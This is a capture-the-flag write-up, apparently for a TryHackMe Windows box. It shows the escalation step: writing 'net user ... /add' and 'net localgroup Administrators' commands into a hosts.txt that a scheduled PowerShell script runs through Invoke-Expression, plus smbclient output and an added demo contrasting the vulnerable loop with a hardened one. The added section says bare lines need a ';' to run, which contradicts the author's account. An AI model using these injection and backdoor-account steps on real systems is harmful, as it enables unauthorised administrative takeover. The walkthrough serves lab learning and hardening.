After spending some more time enumerating, I decided to look into the PowerShell script again, which I had completely forgotten about. Going through it line by line, I noticed this line:

get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |   

The script reads C:\Users\brittanycr\hosts.txt (in her profile folder, not on her desktop) on every cycle, and each non-comment line is interpolated into a command string that is passed to Invoke-Expression. Anything I write into that file is therefore executed by whatever account runs the script; if, as I suspect, that is an administrative account, I can run anything as an Administrator. Conveniently, I now know Brittany's password, so I can access her directory and replace the hosts file. Let us do it with smbclient.

root@nav1n:~/thm/ra # smbclient //windcorp.thm/Users/brittanycr/Desktop -U brittanycr
Enter WORKGROUP\brittanycr's password: 
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
root@nav1n:~/thm/ra # smbclient //windcorp.thm/Users -U brittanycr
Enter WORKGROUP\brittanycr's password: 
Try "help" to get a list of possible commands.
smb: \> sir
sir: command not found
smb: \> ls
  .                                  DR        0  Sun May  3 01:05:58 2020
  ..                                 DR        0  Sun May  3 01:05:58 2020
  Administrator                       D        0  Sun May 10 14:18:11 2020
  All Users                         DHS        0  Sat Sep 15 10:28:48 2018
  angrybird                           D        0  Fri May  1 15:59:20 2020
  berg                                D        0  Fri May  1 15:59:20 2020
  bluefrog579                         D        0  Fri May  1 15:59:20 2020
  brittanycr                          D        0  Sun May  3 02:36:46 2020
  brownostrich284                     D        0  Fri May  1 15:59:20 2020
  buse                                D        0  Fri Jul 31 17:05:04 2020
  Default                           DHR        0  Fri May  1 02:35:11 2020
  Default User                      DHS        0  Sat Sep 15 10:28:48 2018
  desktop.ini                       AHS      174  Sat Sep 15 10:16:48 2018
  edward                              D        0  Fri May  1 15:59:20 2020
  freddy                              D        0  Sun May  3 02:30:16 2020
  garys                               D        0  Fri May  1 15:59:20 2020
  goldencat416                        D        0  Fri Jul 31 20:06:05 2020
  goldenwol                           D        0  Fri May  1 15:59:20 2020
  happ                                D        0  Fri May  1 15:59:20 2020
  happyme                             D        0  Fri May  1 15:59:20 2020
  Luis                                D        0  Fri May  1 15:59:20 2020
  orga                                D        0  Fri May  1 15:59:20 2020
  organicf                            D        0  Fri May  1 15:59:20 2020
  organicfish718                      D        0  Fri Jul 31 20:01:59 2020
  pete                                D        0  Fri May  1 15:59:20 2020
  Public                             DR        0  Thu Apr 30 17:35:47 2020
  purplecat                           D        0  Fri May  1 15:59:20 2020
  purplepanda                         D        0  Fri May  1 15:59:20 2020
  sadswan                             D        0  Fri May  1 15:59:20 2020
  sadswan869                          D        0  Fri Jul 31 20:05:23 2020
  sheela                              D        0  Fri May  1 15:59:20 2020
  silver                              D        0  Fri May  1 15:59:20 2020
  smallf                              D        0  Fri May  1 15:59:20 2020
  spiff                               D        0  Fri May  1 15:59:20 2020
  tinygoos                            D        0  Fri May  1 15:59:20 2020
  whiteleopard                        D        0  Fri May  1 15:59:20 2020

		15587583 blocks of size 4096. 10896976 blocks available
smb: \> cd brittanycr
smb: \brittanycr\> ls
  .                                   D        0  Sun May  3 02:36:46 2020
  ..                                  D        0  Sun May  3 02:36:46 2020
  hosts.txt                           A       22  Sun May  3 16:44:57 2020

		15587583 blocks of size 4096. 10896958 blocks available
smb: \brittanycr\> get hosts.txt
getting file \brittanycr\hosts.txt of size 22 as hosts.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \brittanycr\> 

Hosts File Contents:

The hosts file doesn't have much in it, only a couple of host names.

Creating a New Administrator User

Creating a new administrator is just two commands away. I used net user and net localgroup as follows:

net user nav1n P@ssw0rd! /add
net localgroup Administrators nav1n /add

I put these commands into my copy of hosts.txt, uploaded it to Brittany's directory with smbclient, and waited for the scheduled script to run and create my new user nav1n.
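To make the injection concrete, here is an added example (not code from the box or from the original post) that reproduces the vulnerable loop from checkservers.ps1 against a throw-away hosts file in $env:TEMP and puts the hardened version beside it. The hosts file lines are constructed demo input, and the injected line only writes a marker file with the caller's identity rather than creating a user; file names hosts-demo.txt and injected.txt are my placeholders.

```powershell
# Added example (not from the box or the original post): why checkservers.ps1
# is exploitable and how to write the same loop safely. Runs against a
# throw-away hosts file in $env:TEMP; the injected line only drops a marker
# file containing the caller's identity, it does not create a user.

$hostsFile = Join-Path $env:TEMP 'hosts-demo.txt'   # stand-in for C:\Users\brittanycr\hosts.txt
$marker    = Join-Path $env:TEMP 'injected.txt'     # proof that the injected command ran
Remove-Item $marker -ErrorAction SilentlyContinue

# Constructed hosts.txt: one genuine entry and one injected line. The ';' ends
# the Test-Connection statement so the remainder runs as new statements; the
# trailing Test-Connection soaks up the " -Count 1 -ea silentlycontinue" that
# the script appends. No '#' may appear, the script drops lines containing it.
@(
    'localhost'
    "localhost; Set-Content -Path '$marker' -Value (whoami); Test-Connection -ComputerName localhost"
) | Set-Content -Path $hostsFile

# --- Vulnerable pattern, same shape as the original script -------------------
function Invoke-VulnerableCheck {
    Get-Content $hostsFile | Where-Object { !($_ -match '#') } | ForEach-Object {
        # The host name is interpolated into a command string that is then EVALUATED.
        # Note also that the original tests "$p" (the command text, never empty)
        # instead of the ping result, so every host is reported as available.
        $p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
        Invoke-Expression $p
    }
}

# --- Hardened pattern --------------------------------------------------------
function Invoke-SafeCheck {
    Get-Content $hostsFile |
        ForEach-Object { $_.Trim() } |
        Where-Object { $_ -and -not $_.StartsWith('#') } |
        ForEach-Object {
            # 1. Allow-list the input: a host name or IP address, nothing else.
            if ($_ -notmatch '^[A-Za-z0-9.\-]{1,253}$') {
                Write-Warning "Skipping malformed entry: $_"
                return
            }
            # 2. Pass the value as an ARGUMENT; never build and evaluate a string.
            $up = Test-Connection -ComputerName $_ -Count 1 -Quiet -ErrorAction SilentlyContinue
            [pscustomobject]@{ Host = $_; Up = [bool]$up }
        }
}

Invoke-VulnerableCheck | Out-Null
"Vulnerable loop: marker present = $(Test-Path $marker)"    # True, the payload ran
if (Test-Path $marker) { "Injected command ran as: $(Get-Content $marker)" }

Remove-Item $marker -ErrorAction SilentlyContinue
Invoke-SafeCheck | Format-Table -AutoSize
"Hardened loop:   marker present = $(Test-Path $marker)"    # False, the entry was skipped
```

Two points follow from this. A bare `net user ...` line on its own is not a command to the script: it is glued onto the Test-Connection statement as extra arguments, and it is the `;` that turns the remainder of the line into separate statements. And the attack needs only write access to the file in Brittany's profile, not any right on checkservers.ps1 itself, which is why the "access denied" on the script did not matter. For the script's owner, the fix is the second function: treat hosts.txt as untrusted input, validate it against an allow-list, and pass values as cmdlet arguments instead of through Invoke-Expression.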

Flag #3

After a minute I used Evil-WinRM again to log in as nav1n, browsed to the Administrator's desktop and got flag #3.

That’s it, thank you for reading.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n
